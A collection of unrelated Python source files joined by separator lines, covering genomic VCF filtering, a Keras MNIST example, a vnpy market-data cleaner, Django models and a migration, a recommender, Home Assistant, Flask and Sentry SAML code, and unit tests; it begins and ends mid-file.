probandDict[sample[familyIdIndex]] = [sample[sampleIdIndex], sample[fileNameIndex]]
if sample[familyIdIndex] not in familyDict:
familyDict[sample[familyIdIndex]] = [[sample[sampleIdIndex], sample[fileNameIndex]]]
else:
familyDict[sample[familyIdIndex]].append([sample[sampleIdIndex], sample[fileNameIndex]])
else:
if sample[familyIdIndex] not in familyDict:
familyDict[sample[familyIdIndex]] = [[sample[sampleIdIndex], sample[fileNameIndex]]]
else:
familyDict[sample[familyIdIndex]].append([sample[sampleIdIndex], sample[fileNameIndex]])
# Create new familyDict, called trioDict, to include only the files with trios
trioDict = {}
familyList = []
for key, value in familyDict.items():
if len(value) == 3:
trioDict[key] = value
familyList.append(key)
# Filter each proband file, remove variants-only sites, create a dictionary of variant-only sites
def filterVariantOnly(familyID, probandID, fileName):
os.system(f"mkdir {pathToFiles}/{familyID}")
os.system(f"mkdir {pathToFiles}/{familyID}/{probandID}")
outputName = f"{pathToFiles}/{familyID}/{probandID}/{probandID}_parsed.vcf"
positionDict = {}
with gzip.open(f"{pathToFiles}/{fileName}", 'rt') as gVCF, gzip.open(outputName, 'wb') as parsed:
for line in gVCF:
if line.startswith('#'):
parsed.write(line.encode())
elif "END" not in line:
parsed.write(line.encode())
line = line.split("\t")
chrom = line[0]
pos = line[1]
if chrom not in positionDict:
positionDict[chrom] = {pos}
else:
positionDict[chrom].add(pos)
finalName = f"{outputName}.gz"
os.system(f"zcat {outputName} | /root/miniconda2/bin/bgzip > {finalName}")
os.system(f"rm {outputName}")
os.system(f"rm {pathToFiles}/{fileName}") # remove raw input file
return(positionDict)
#Filter each parent file for sites that occur in proband of that family
def filterParents(familyID, parentID, fileName, positionDict):
os.system(f"mkdir {pathToFiles}/{familyID}/{parentID}")
outputName = f"{pathToFiles}/{familyID}/{parentID}/{parentID}_parsed.vcf"
with gzip.open(f"{pathToFiles}/{fileName}", 'rt') as gVCF, gzip.open(outputName, 'wb') as parsed:
for line in gVCF:
if line.startswith("#"):
parsed.write(line.encode())
else:
lineList = line.split("\t")
chrom = lineList[0]
pos = lineList[1]
if pos in positionDict[chrom]:
parsed.write(line.encode())
else:
if "END" in line:
for i in range(int(pos), int(lineList[7].lstrip("END=")) + 1):
if str(i) in positionDict[chrom]:
parsed.write(line.encode())
finalName = f"{outputName}.gz"
os.system(f"zcat {outputName} | /root/miniconda2/bin/bgzip > {finalName}")
os.system(f"rm {outputName}")
os.system(f"rm {pathToFiles}/{fileName}") # remove raw input file
# Iterate through familyList and remove variant sites from proband first, while creating a position dictionary.
# Then use the position dictionary to iterate through each parent file and keep positions that are in common with proband.
def filterFiles(familyID):
for sample in trioDict[familyID]:
if sample == probandDict[familyID]:
probandID = sample[0]
fileName = sample[1]
positionDict = filterVariantOnly(familyID, probandID, fileName)
for sample in trioDict[familyID]:
if sample != probandDict[familyID]:
parentID = sample[0]
fileName = sample[1]
filterParents(familyID, parentID, fileName, positionDict)
# Use concurrent.futures to filter through multiple trios at a time using the filterFiles function
for i in range(0, len(familyList), numCores):
familyListSlice = familyList[i:(i+numCores)]
with concurrent.futures.ProcessPoolExecutor(max_workers=numCores) as executor:
executor.map(filterFiles, familyListSlice)
#Print message and how long the previous steps took
timeElapsedMinutes = round((time.time()-startTime) / 60, 2)
timeElapsedHours = round(timeElapsedMinutes / 60, 2)
print(f'{char}Done. Time elapsed: {timeElapsedMinutes} minutes ({timeElapsedHours} hours) {char}') |
# -*- coding: utf-8 -*-
from keras import models
from keras import layers
from keras.datasets import mnist
from keras.utils import to_categorical
# ニューラルネットワークの構築とコンパイル
network = models.Sequential()
network.add(layers.Dense(512, activation='relu', input_shape=(28 * 28,)))
network.add(layers.Dense(10, activation='softmax'))
network.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])
network.summary()
# 画像データの準備
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
train_images = train_images.reshape((60000, 28 * 28))
train_images = train_images.astype('float32') / 255.0
test_images = test_images.reshape((10000, 28 * 28))
test_images = test_images.astype('float32') / 255.0
# ラベルの準備
train_labels = to_categorical(train_labels)
print("train_labels[0] : " , train_labels[0])
test_labels = to_categorical(test_labels)
print("test_labels[0] : " ,test_labels[0])
# 学習
network.fit(train_images, train_labels, epochs=10, batch_size=128)
test_loss, test_acc = network.evaluate(test_images, test_labels)
print('test_acc : ' , test_acc)
print('test_loss : ' , test_loss)
|
#!/usr/bin/env python
import os
ELASTICSEARCH_LOGSTASH_INDEX = "suricata-"
ELASTICSEARCH_LOGSTASH_ALERT_INDEX = "suricata-"
ELASTICSEARCH_VERSION = os.environ["ELASTICSEARCH_VERSION"] if "ELASTICSEARCH_VERSION" in os.environ else 7
ELASTICSEARCH_KEYWORD = "keyword"
ELASTICSEARCH_LOGSTASH_TIMESTAMPING = os.environ['ELASTICSEARCH_LOGSTASH_TIMESTAMPING'] if "ELASTICSEARCH_LOGSTASH_TIMESTAMPING" in os.environ else "daily"
ELASTICSEARCH_ADDRESS = os.environ['ELASTICSEARCH_ADDRESS'] if "ELASTICSEARCH_ADDRESS" in os.environ else "elasticsearch:9200"
ALLOWED_HOSTS = os.environ['ALLOWED_HOSTS'].split(",") if "ALLOWED_HOSTS" in os.environ else ["localhost"]
SURICATA_NAME_IS_HOSTNAME = False
#SURICATA_NAME_IS_HOSTNAME = True
SURICATA_UNIX_SOCKET = os.environ['SURICATA_UNIX_SOCKET'] if "SURICATA_UNIX_SOCKET" in os.environ and os.environ["SURICATA_UNIX_SOCKET"] != "" else None
#USE_KIBANA = True
#KIBANA_URL = "http://$EXPOSE:5601"
#KIBANA_INDEX = ".kibana"
#USE_EVEBOX = True
#EVEBOX_ADDRESS = "$EXPOSE:5636"
|
# encoding: UTF-8
from __future__ import print_function
import json
from datetime import datetime, timedelta, time
from pymongo import MongoClient
from vnpy.trader.app.ctaStrategy.ctaBase import MINUTE_DB_NAME, TICK_DB_NAME
from vnpy.trader.vtUtility import get_trade_time
#----------------------------------------------------------------------
def cleanData(dbName, collectionName, start):
"""清洗数据"""
print(u'\n清洗数据库:%s, 集合:%s, 起始日:%s' %(dbName, collectionName, start))
mc = MongoClient('localhost', 27017) # 创建MongoClient
cl = mc[dbName][collectionName] # 获取数据集合
d = {'datetime':{'$gte':start}} # 只过滤从start开始的数据
cx = cl.find(d) # 获取数据指针
data_time = [d['datetime'].time() for d in cx] #数据时间戳
#获取合约交易时间
trade_time = get_trade_time(collectionName)
# 遍历数据
for data in cx:
# 获取时间戳对象
dt = data['datetime'].time()
# 默认需要清洗
cleanRequired = True
# 如果在交易事件内,则为有效数据,无需清洗
#没有夜盘, 也没有早盘休息
if trade_time['morning_rest'] is None and trade_time['night_start'] is None:
if ((trade_time['morning_start'] <= dt <trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end'])):
cleanRequired = False
#有早盘休息, 没有夜盘
elif trade_time['morning_rest'] is not None and trade_time['night_start'] is None:
if ((trade_time['morning_start'] <= dt <trade_time['morning_rest']) or
(trade_time['morning_restart'] <= dt < trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end'])):
cleanRequired = False
#有早盘休息,有夜盘
else:
#夜盘隔天结束
if trade_time['night_end'] < time(3, 0, 0):
if ((trade_time['morning_start'] <= dt <trade_time['morning_rest']) or
(trade_time['morning_restart'] <= dt < trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end']) or
(dt >= trade_time['night_start']) or (dt <= trade_time['night_end'])):
cleanRequired = False
#夜盘当天结束
else:
if ((trade_time['morning_start'] <= dt <trade_time['morning_rest']) or
(trade_time['morning_restart'] <= dt < trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end']) or
(trade_time['night_start'] <= dt < trade_time['night_end'])):
cleanRequired = False
#如果数据时间戳重复,则需要清洗
if date_time.count(dt) > 1:
cleanRequired = True
date_time.remove(dt)
print(u'存在重复数据')
# 如果需要清洗
if cleanRequired:
print(u'删除无效数据,时间戳:%s' %data['datetime'])
cl.delete_one(data)
print(u'清洗完成,数据库:%s, 集合:%s' %(dbName, collectionName))
#----------------------------------------------------------------------
def runDataCleaning():
"""运行数据清洗"""
print(u'开始数据清洗工作')
# 加载配置
setting = {}
with open("DR_setting.json") as f:
setting = json.load(f)
# 遍历执行清洗
today = datetime.now()
start = today - timedelta(10) # 清洗过去10天数据
start.replace(hour=0, minute=0, second=0, microsecond=0)
for l in setting['tick']:
symbol = l[0]
cleanData(TICK_DB_NAME, symbol, start)
for l in setting['bar']:
symbol = l[0]
cleanData(MINUTE_DB_NAME, symbol, start)
print(u'数据清洗工作完成')
if __name__ == '__main__':
runDataCleaning()
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from django.urls import reverse
from django.utils.functional import cached_property
from django_autoslugfield.fields import AutoSlugField
from common_utils.models import TimestampModelMixin
from rich_editor.fields import RichTextOriginalField, RichTextFilteredField
NEWS_MAX_LENGTH = getattr(settings, 'NEWS_MAX_LENGTH', 3000)
class Category(models.Model):
name = models.CharField(
verbose_name="názov",
max_length=255
)
slug = models.SlugField(
verbose_name="skratka URL",
unique=True
)
description = models.TextField(
verbose_name="popis"
)
def get_absolute_url(self):
return reverse('news:list-category', kwargs={'category': self.slug, 'page': 1})
def __str__(self):
return self.name
class Meta:
verbose_name = "kategória"
verbose_name_plural = "kategórie"
class NewsManager(models.Manager):
def get_queryset(self):
return (super().get_queryset()
.select_related('author'))
class NewsListManager(models.Manager):
def get_queryset(self):
return (super().get_queryset()
.select_related('author')
.filter(approved=True)
.order_by('-pk'))
class News(TimestampModelMixin, models.Model):
all_news = NewsManager()
objects = NewsListManager()
title = models.CharField(
verbose_name="titulok",
max_length=255
)
slug = AutoSlugField(
verbose_name="skratka URL",
title_field='title',
unique=True
)
category = models.ForeignKey(
Category,
verbose_name="kategória",
on_delete=models.PROTECT
)
original_short_text = RichTextOriginalField(
verbose_name="krátky text",
filtered_field='filtered_short_text',
property_name='short_text',
parsers={'html': 'news_short'},
max_length=NEWS_MAX_LENGTH
)
filtered_short_text = RichTextFilteredField(
)
original_long_text = RichTextOriginalField(
verbose_name="dlhý text",
filtered_field='filtered_long_text',
property_name='long_text',
parsers={'html': 'news_long'},
help_text="Vyplňte v prípade, že sa text v detaile správy má líšiť od textu v zozname."
)
filtered_long_text = RichTextFilteredField(
)
author = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name="autor",
on_delete=models.SET_NULL,
blank=True,
null=True
)
authors_name = models.CharField(
verbose_name="meno autora",
max_length=255
)
source = models.CharField(
verbose_name="zdroj",
max_length=100,
blank=True
)
source_url = models.URLField(
verbose_name="URL zdroja",
max_length=1000,
blank=True
)
approved = models.BooleanField(
verbose_name="schválená",
default=False
)
comments_header = GenericRelation('comments.RootHeader')
comments = GenericRelation('comments.Comment')
attachments = GenericRelation('attachment.Attachment')
notes = GenericRelation('notes.Note')
content_fields = ('original_short_text', 'original_long_text',)
class Meta:
verbose_name = "správa"
verbose_name_plural = "správy"
def get_absolute_url(self):
return reverse('news:detail', kwargs={'slug': self.slug})
def get_list_url(self):
return reverse('news:list', kwargs={'page': 1})
@cached_property
def admin_notes(self):
return self.notes.order_by('pk')
@cached_property
def public_notes(self):
return self.admin_notes.filter(is_public=True)
def __str__(self):
return self.title
|
# coding=utf-8
"""
UserKNN based on Collaborative Filtering Recommender
[Rating Prediction]
Literature:
KAggarwal, Charu C.:
Chapter 2: Neighborhood-Based Collaborative Filtering
Recommender Systems: The Textbook. 2016
file:///home/fortesarthur/Documentos/9783319296579-c1.pdf
"""
# © 2018. Case Recommender (MIT License)
import numpy as np
from caserec.utils.extra_functions import timed
from caserec.recommenders.rating_prediction.base_knn import BaseKNN
__author__ = 'Arthur Fortes <[email protected]>'
class UserKNN(BaseKNN):
def __init__(self, train_file=None, test_file=None, output_file=None, similarity_metric="cosine", k_neighbors=None,
as_similar_first=False, sep='\t', output_sep='\t'):
"""
UserKNN for rating prediction
This algorithm predicts ratings for each user based on the similar items that his neighbors
(similar users) consumed.
Usage::
>> UserKNN(train, test).compute()
>> UserKNN(train, test, ranking_file, as_similar_first=True, k_neighbors=60).compute()
:param train_file: File which contains the train set. This file needs to have at least 3 columns
(user item feedback_value).
:type train_file: str
:param test_file: File which contains the test set. This file needs to have at least 3 columns
(user item feedback_value).
:type test_file: str, default None
:param output_file: File with dir to write the final predictions
:type output_file: str, default None
:param similarity_metric: Pairwise metric to compute the similarity between the users. Reference about
distances: http://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.spatial.distance.pdist.html
:type similarity_metric: str, default cosine
:param k_neighbors: Number of neighbors to use. If None, k_neighbor = int(sqrt(n_users))
:type k_neighbors: int, default None
:param as_similar_first: If True, for each unknown item, which will be predicted, we first look for its k
most similar users and then take the intersection with the users that
seen that item.
:type as_similar_first: bool, default False
:param sep: Delimiter for input files
:type sep: str, default '\t'
:param output_sep: Delimiter for output file
:type output_sep: str, default '\t'
"""
super(UserKNN, self).__init__(train_file=train_file, test_file=test_file, output_file=output_file,
similarity_metric=similarity_metric, sep=sep, output_sep=output_sep)
self.recommender_name = 'UserKNN Algorithm'
self.as_similar_first = as_similar_first
self.k_neighbors = k_neighbors
# internal vars
self.su_matrix = None
self.users_id_viewed_item = None
def init_model(self):
"""
Method to initialize the model. Compute similarity matrix based on user (user x user)
"""
super(UserKNN, self).init_model()
self.users_id_viewed_item = {}
# Set the value for k
if self.k_neighbors is None:
self.k_neighbors = int(np.sqrt(len(self.users)))
self.su_matrix = self.compute_similarity(transpose=False)
# Map the users which seen an item with their respective ids
for item in self.items:
for user in self.train_set['users_viewed_item'].get(item, []):
self.users_id_viewed_item.setdefault(item, []).append(self.user_to_user_id[user])
def predict(self):
"""
Method to predict ratings for all known users in the train set.
"""
for user in self.users:
if len(self.train_set['feedback'].get(user, [])) != 0:
if self.test_file is not None:
if self.as_similar_first:
self.predictions += self.predict_similar_first_scores(user, self.test_set['items_seen_by_user']
.get(user, []))
else:
self.predictions += self.predict_scores(user, self.test_set['items_seen_by_user'].get(user, []))
else:
# Selects items that user has not interacted with.
items_seen_by_user = []
u_list = list(np.flatnonzero(self.matrix[self.user_to_user_id[user]] == 0))
for item_id in u_list:
items_seen_by_user.append(self.item_id_to_item[item_id])
if self.as_similar_first:
self.predictions += self.predict_similar_first_scores(user, items_seen_by_user)
else:
self.predictions += self.predict_scores(user, items_seen_by_user)
else:
# Implement cold start user
pass
def predict_scores(self, user, unpredicted_items):
"""
In this implementation, for each unknown item,
which will be predicted, we first look for users that seen that item and calculate the similarity between them
and the user. Then we sort these similarities and get the most similar k's. Finally, the score of the
unknown item will be the sum of the similarities.
rui = bui + (sum((rvi - bvi) * sim(u,v)) / sum(sim(u,v)))
:param user: User
:type user: int
:param unpredicted_items: A list of unknown items for each user
:type unpredicted_items: list
:return: Sorted list with triples user item rating
:rtype: list
"""
u_id = self.user_to_user_id[user]
predictions = []
for item in unpredicted_items:
neighbors = []
rui = 0
sim_sum = 0
for user_v_id in self.users_id_viewed_item.get(item, []):
user_v = self.user_id_to_user[user_v_id]
neighbors.append((user_v, self.su_matrix[u_id, user_v_id], self.train_set['feedback'][user_v][item]))
neighbors = sorted(neighbors, key=lambda x: -x[1])
if neighbors:
for triple in neighbors[:self.k_neighbors]:
rui += (triple[2] - self.bui[triple[0]][item]) * triple[1] if triple[1] != 0 else 0.001
sim_sum += triple[1] if triple[1] != 0 else 0.001
rui = self.bui[user][item] + (rui / sim_sum)
else:
rui = self.bui[user][item]
# normalize the ratings based on the highest and lowest value.
if rui > self.train_set["max_value"]:
rui = self.train_set["max_value"]
if rui < self.train_set["min_value"]:
rui = self.train_set["min_value"]
predictions.append((user, item, rui))
return sorted(predictions, key=lambda x: x[1])
def predict_similar_first_scores(self, user, unpredicted_items):
"""
In this implementation, for each unknown item, which will be
predicted, we first look for its k most similar users and then take the intersection with the users that
seen that item. Finally, the score of the unknown item will be the sum of the similarities.
rui = bui + (sum((rvi - bvi) * sim(u,v)) / sum(sim(u,v)))
:param user: User
:type user: int
:param unpredicted_items: A list of unknown items for each user
:type unpredicted_items: list
:return: Sorted list with triples user item rating
:rtype: list
"""
u_id = self.user_to_user_id[user]
predictions = []
# Select user neighbors, sorting user similarity vector. Returns a list with index of sorting values
neighbors = sorted(range(len(self.su_matrix[u_id])), key=lambda m: -self.su_matrix[u_id][m])
for item in unpredicted_items:
rui = 0
sim_sum = 0
# Intersection bt. the neighbors closest to the user and the users who accessed the unknown item.
common_users = list(set(
self.users_id_viewed_item.get(item, [])).intersection(neighbors[1:self.k_neighbors]))
if common_users:
for user_v_id in common_users:
user_v = self.user_id_to_user[user_v_id]
sim_uv = self.su_matrix[u_id, user_v_id]
rui += (self.train_set['feedback'][user_v][item] - self.bui[user_v][item]) * \
sim_uv if sim_sum != 0 else 0.001
sim_sum += sim_uv if sim_sum != 0 else 0.001
rui = self.bui[user][item] + (rui / sim_sum)
else:
rui = self.bui[user][item]
# normalize the ratings based on the highest and lowest value.
if rui > self.train_set["max_value"]:
rui = self.train_set["max_value"]
if rui < self.train_set["min_value"]:
rui = self.train_set["min_value"]
predictions.append((user, item, rui))
return sorted(predictions, key=lambda x: x[1])
def compute(self, verbose=True, metrics=None, verbose_evaluation=True, as_table=False, table_sep='\t'):
"""
Extends compute method from BaseItemRecommendation. Method to run recommender algorithm
:param verbose: Print recommender and database information
:type verbose: bool, default True
:param metrics: List of evaluation metrics
:type metrics: list, default None
:param verbose_evaluation: Print the evaluation results
:type verbose_evaluation: bool, default True
:param as_table: Print the evaluation results as table
:type as_table: bool, default False
:param table_sep: Delimiter for print results (only work with verbose=True and as_table=True)
:type table_sep: str, default '\t'
"""
super(UserKNN, self).compute(verbose=verbose)
if verbose:
self.init_model()
print("training_time:: %4f sec" % timed(self.train_baselines))
if self.extra_info_header is not None:
print(self.extra_info_header)
print("prediction_time:: %4f sec" % timed(self.predict))
else:
# Execute all in silence without prints
self.extra_info_header = None
self.init_model()
self.train_baselines()
self.predict()
self.write_predictions()
if self.test_file is not None:
self.evaluate(metrics, verbose_evaluation, as_table=as_table, table_sep=table_sep)
|
# -*- coding: utf-8 -*-
"""
Regular expression serving object.
Author:
-------
Sri Ram Sagar K
Created on Sat Jan 13 20:41:11 2018
"""
import re
class ReObjects(object):
''' Regex precompiled objects based on pattern'''
emails = (r".*@\s*gmu\s*.\s*edu", r".*AT\s*(gmu|GMU)\s*DOT\s*(edu|EDU)")
phones = (r"(\d{3})\s*-\s*\d{3}\s*-\s*\d{4}",)
email_patterns = [re.compile(obj) for obj in emails]
phone_patterns = [re.compile(obj) for obj in phones] |
import logging
import voluptuous as vol
from homeassistant.components.websocket_api import (
websocket_command,
result_message,
event_message,
async_register_command
)
from .const import WS_CONNECT, WS_UPDATE
from .helpers import get_devices, create_entity, get_config, is_setup_complete
_LOGGER = logging.getLogger(__name__)
async def setup_connection(hass, config):
@websocket_command({
vol.Required("type"): WS_CONNECT,
vol.Required("deviceID"): str,
})
def handle_connect(hass, connection, msg):
deviceID = msg["deviceID"]
device = get_devices(hass).get(deviceID,
BrowserModConnection(hass, deviceID))
device.connect(connection, msg["id"])
get_devices(hass)[deviceID] = device
connection.send_message(result_message(msg["id"]))
@websocket_command({
vol.Required("type"): WS_UPDATE,
vol.Required("deviceID"): str,
vol.Optional("data"): dict,
})
def handle_update(hass, connection, msg):
devices = get_devices(hass)
deviceID = msg["deviceID"]
if deviceID in devices:
devices[deviceID].update(msg.get("data", None))
async_register_command(hass, handle_connect)
async_register_command(hass, handle_update)
class BrowserModConnection:
def __init__(self, hass, deviceID):
self.hass = hass
self.deviceID = deviceID
self.connection = []
self.media_player = None
self.screen = None
self.sensor = None
self.fully = None
self.camera = None
def connect(self, connection, cid):
self.connection.append((connection, cid))
self.trigger_update()
def disconnect():
self.connection.remove((connection, cid))
connection.subscriptions[cid] = disconnect
def send(self, command, **kwargs):
if self.connection:
connection, cid = self.connection[-1]
connection.send_message(event_message(cid, {
"command": command,
**kwargs,
}))
def trigger_update(self):
if is_setup_complete(self.hass):
self.send("update", **get_config(self.hass, self.deviceID))
def update(self, data):
if data.get('browser'):
self.sensor = self.sensor or create_entity(
self.hass,
'sensor',
self.deviceID,
self)
if self.sensor:
self.sensor.data = data.get('browser')
if data.get('player'):
self.media_player = self.media_player or create_entity(
self.hass,
'media_player',
self.deviceID,
self)
if self.media_player:
self.media_player.data = data.get('player')
if data.get('screen'):
self.screen = self.screen or create_entity(
self.hass,
'light',
self.deviceID,
self)
if self.screen:
self.screen.data = data.get('screen')
if data.get('fully'):
self.fully = self.fully or create_entity(
self.hass,
'binary_sensor',
self.deviceID,
self)
if self.fully:
self.fully.data = data.get('fully')
if data.get('camera'):
self.camera = self.camera or create_entity(
self.hass,
'camera',
self.deviceID,
self)
if self.camera:
self.camera.data = data.get('camera')
|
import json
import os
from werkzeug.contrib.fixers import ProxyFix
from flask import Flask, request, redirect, url_for, abort, jsonify
from flask_cors import CORS, cross_origin
from biosimulations_dispatch.config import Config
from biosimulations_dispatch.hpc_manager import HPCManager
class PrefixMiddleware:
def __init__(self, app, prefix=''):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][len(self.prefix):]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404', [('Content-Type', 'text/plain')])
return ["This url does not belong to the app.".encode()]
app = Flask(__name__)
cors = CORS(app)
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix='')
app.wsgi_app = ProxyFix(app.wsgi_app)
@app.route('/dispatch', methods=['POST'])
@cross_origin()
def dispatch_to_hpc():
if request.method == 'POST' and request.remote_addr in Config.ALLOWED_ORIGINS:
try:
hpc_manager = HPCManager(username=Config.HPC_USER, password=Config.HPC_PASS, server=Config.HPC_HOST, sftp_server=Config.HPC_SFTP_HOST)
data = request.get_json()
result = hpc_manager.dispatch_job(
# TODO: parse simulator from sim spec within dispatch_job
simulator = data['simSpec']['simulator'],
value_dict = data['simSpec'],
sedml = data['sedml'],
sedml_name = data['sedmlName'],
sbml = data['sbml'],
temp_dir = Config.TEMP_DIR
)
if result:
return jsonify({"message": result}), 200
else:
return jsonify({'message': 'Job submission failed'}), 400
except BaseException as ex:
return jsonify({'message': "Error occured: " + str(ex)}), 400
elif request.remote_addr not in Config.ALLOWED_ORIGINS:
return jsonify({'message': 'Requester origin \'{}\' is not allowed'.format(request.remote_addr)}), 400
else:
return jsonify({'message': 'Bad request'}), 400 |
#!/usr/bin/env python3
import csv
import io
import json
import time
import argparse
import requests
import yaml
from libgather import Gather
def parse_arguments():
parser = argparse.ArgumentParser(description="MiniConf Portal Command Line")
parser.add_argument("email", help="email address of user")
return parser.parse_args()
if __name__ == "__main__":
config = yaml.load(open("config.yml").read(), Loader=yaml.SafeLoader)
args = parse_arguments()
gather = Gather(config["gather_api_key"], config["gather_space_id"])
dict = gather.getGatherEmailDictionary()
del dict[args.email]
gather.setGatherEmailDictionary(
dict,
True # Must overwrite here... This is racy with other updates!
)
|
from __future__ import absolute_import, print_function
from django.core.urlresolvers import reverse
from sentry.auth.view import AuthView, ConfigureView
from sentry.utils.http import absolute_uri
from sentry_auth_saml2.forms import (
AttributeMappingForm, SAMLForm, URLMetadataForm, XMLMetadataForm,
process_metadata,
)
class SAML2ConfigureView(ConfigureView):
def dispatch(self, request, organization, provider):
sp_metadata_url = absolute_uri(reverse('sentry-auth-organization-saml-metadata', args=[organization.slug]))
if request.method != 'POST':
saml_form = SAMLForm(provider.config['idp'])
attr_mapping_form = AttributeMappingForm(provider.config['attribute_mapping'])
else:
saml_form = SAMLForm(request.POST)
attr_mapping_form = AttributeMappingForm(request.POST)
if saml_form.is_valid() and attr_mapping_form.is_valid():
provider.config['idp'] = saml_form.cleaned_data
provider.config['attr_mapping_form'] = attr_mapping_form.cleaned_data
provider.save()
return self.render('sentry_auth_saml2/configure.html', {
'sp_metadata_url': sp_metadata_url,
'forms': {'saml': saml_form, 'attrs': attr_mapping_form},
})
class SelectIdP(AuthView):
def handle(self, request, helper):
op = 'url'
forms = {
'url': URLMetadataForm(),
'xml': XMLMetadataForm(),
'idp': SAMLForm(),
}
if 'action_save' in request.POST:
op = request.POST['action_save']
form_cls = forms[op].__class__
forms[op] = process_metadata(form_cls, request, helper)
# process_metadata will return None when the action was successful and
# data was bound to the helper.
if not forms[op]:
return helper.next_step()
return self.respond('sentry_auth_saml2/select-idp.html', {
'op': op,
'forms': forms,
})
class MapAttributes(AuthView):
def handle(self, request, helper):
if 'save_mappings' not in request.POST:
form = AttributeMappingForm()
else:
form = AttributeMappingForm(request.POST)
if form.is_valid():
helper.bind_state('attribute_mapping', form.cleaned_data)
return helper.next_step()
return self.respond('sentry_auth_saml2/map-attributes.html', {
'form': form,
})
|
# -*- coding: utf-8 -*-
import unittest
"""
*******************************************************************************
Tests of the quantarhei.qm.hilbertspace.statevector package
*******************************************************************************
"""
from quantarhei import StateVector
class TestStateVector(unittest.TestCase):
"""Tests for the statevector package
"""
def test_of_state_vector_creation(self):
"""Testing StateVector creation """
psi = StateVector(3)
self.assertEqual(psi.dim,3)
psi = StateVector()
self.assertFalse(psi._initialized)
def test_of_sv_creation_from_data(self):
"""Testing StateVector creation with data"""
import numpy
vec = numpy.zeros((1,3), dtype=numpy.float)
with self.assertRaises(Exception):
psi = StateVector(data=vec)
vec = numpy.zeros(3, dtype=numpy.float)
psi = StateVector(data=vec)
self.assertEqual(psi.dim,3)
def test_creation_from_list(self):
"""Tests creation from non numpy array """
import numpy
vec = [0.1, 2.0, 0.0]
psi = StateVector(data = vec)
self.assertAlmostEqual(psi.norm(), numpy.sqrt(0.1**2 + 4.0))
self.assertAlmostEqual(psi.dot(psi), psi.norm()**2)
def test_of_scalar_product(self):
"""Test StateVector scalar product """
import numpy
vec1 = numpy.zeros(3, dtype=numpy.float)
vec2 = numpy.zeros(3, dtype=numpy.float)
vec1[1] = 1.0
vec2[0] = 1.0
psi1 = StateVector(data=vec1)
psi2 = StateVector(data=vec2)
psi3 = StateVector(3)
psi3.data[1] = 0.5
scl12 = psi1.dot(psi2)
self.assertEqual(scl12, 0.0)
scl13 = psi3.dot(psi1)
self.assertEqual(scl13, 0.5)
self.assertEqual(psi1.dot(psi1), 1.0)
def test_norm(self):
"""Test StateVector norm
"""
import numpy
vec = numpy.zeros(5, dtype=numpy.float)
vec[1] = 2.0
vec[4] = 3.0
psi = StateVector(data=vec)
self.assertAlmostEqual(psi.norm(), numpy.sqrt(13.0))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from glob import glob
import json
my_dir = os.path.abspath(os.path.dirname('__file__'))
# subdir = 'api_programRatings'
# subdir = 'api_commercialRatings'
subdir = sys.argv[1]
print("Searching directory: ", subdir)
outdir = subdir + '_json'
if not os.path.exists(outdir):
os.makedirs(outdir)
lst_api_raw = glob(os.path.join(my_dir, subdir, '*.json'))
for json_file in lst_api_raw:
base_name = os.path.basename(json_file)
write_path = os.path.join(outdir, base_name)
# write_path = write_path.replace('%2B3','_')
write_path = write_path.replace('%','_')
# print(write_path)
# break
with open(json_file,'r+') as fp:
text = fp.read()
pos = text.find("[")
pos2 = max([pos for pos, char in enumerate(text) if char == "]"])
# print(pos,pos2)
# text = text[pos+1:pos2] # remove []
text = text[pos:pos2+1] # keep []
text = text.replace("\\",'')
# print(text)
with open(write_path,'w+') as fo:
fo.write(text)
# break
# json_data = json.loads(text)
# print(type(json_data),len(json_data))
# print(json_data.keys())
# for k,v in json_data.items():
# print(k,len(v)) |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2018-05-02 14:57
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('d4s2_api', '0024_auto_20180423_2026'),
]
operations = [
migrations.CreateModel(
name='DDSDeliveryError',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='S3DeliveryError',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.RenameField(
model_name='ddsdelivery',
old_name='completion_email_text',
new_name='sender_completion_email_text',
),
migrations.RemoveField(
model_name='historicalddsdelivery',
name='completion_email_text',
),
migrations.RemoveField(
model_name='historicals3delivery',
name='completion_email_text',
),
migrations.RemoveField(
model_name='s3delivery',
name='completion_email_text',
),
migrations.AddField(
model_name='historicalddsdelivery',
name='sender_completion_email_text',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='historicals3delivery',
name='sender_completion_email_text',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='s3delivery',
name='sender_completion_email_text',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='ddsdelivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AlterField(
model_name='historicalddsdelivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AlterField(
model_name='historicals3delivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AlterField(
model_name='s3delivery',
name='state',
